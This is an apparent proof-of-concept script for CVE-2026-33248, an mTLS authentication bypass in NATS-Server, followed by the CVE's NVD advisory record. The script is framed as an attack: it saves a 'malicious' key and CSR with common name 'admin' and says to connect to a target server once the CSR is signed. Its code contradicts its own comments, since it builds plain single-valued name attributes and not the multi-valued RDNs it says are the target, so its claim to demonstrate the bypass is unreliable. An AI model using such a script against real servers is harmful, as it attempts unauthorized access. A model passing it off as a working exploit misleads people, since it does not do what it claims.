CVE-2026-33248

#!/usr/bin/env python3 """ PoC for CVE-2026-33248: NATS-Server Authentication Bypass This script demonstrates how to generate a CSR with a specific RDN pattern that might bypass the `verify_and_map` enforcement. Note: This requires a trusted CA to sign the CSR. """ from cryptography import x509 from cryptography.x509.oid import NameOID from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives import serialization import datetime def generate_malicious_csr(): # Generate private key key = rsa.generate_private_key( public_exponent=65537, key_size=2048, ) # Construct a Subject DN with specific RDN patterns # The exact pattern depends on the server configuration, # but complex multi-valued RDNs are the target. name = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, u"admin"), x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"MyOrg"), x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u"SpecialUnit"), ]) csr = x509.CertificateSigningRequestBuilder().subject_name(name).sign(key, hashes.SHA256()) print("[+] Generated CSR with specific RDN pattern.") print(csr.public_bytes(serialization.Encoding.PEM).decode()) # Save private key with open("malicious.key", "wb") as f: f.write(key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() )) # Save CSR with open("malicious.csr", "wb") as f: f.write(csr.public_bytes(serialization.Encoding.PEM)) print("[+] Files saved. Submit 'malicious.csr' to your trusted CA for signing.") print("[!] Once signed, use the certificate to connect to the target NATS server.") if __name__ == "__main__": generate_malicious_csr()

{"cve": {"id": "CVE-2026-33248", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.563", "lastModified": "2026-03-26T16:22:06.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, when using mTLS for client identity, with `verify_and_map` to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass. This does require a valid certificate from a CA already trusted for client certificates, and `DN` naming patterns which the NATS maintainers consider highly unlikely. So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their `DN` construction patterns might conceivably be impacted. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, developers should review their CA issuing practices."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del *edge*. Antes de las versiones 2.11.15 y 2.12.6, al usar mTLS para la identidad del cliente, con 'verify_and_map' para derivar una identidad NATS del DN del Asunto del certificado del cliente, ciertos patrones de RDN no se aplicarían correctamente, permitiendo la omisión de autenticación. Esto requiere un certificado válido de una CA ya confiable para certificados de cliente, y patrones de nombres de 'DN' que los mantenedores de NATS consideran altamente improbables. Por lo tanto, este es un ataque improbable. No obstante, los administradores que han sido muy sofisticados en sus patrones de construcción de 'DN' podrían verse afectados. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, los desarrolladores deberían revisar sus prácticas de emisión de CA."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-13.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-3f24-pcvm-5jqc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}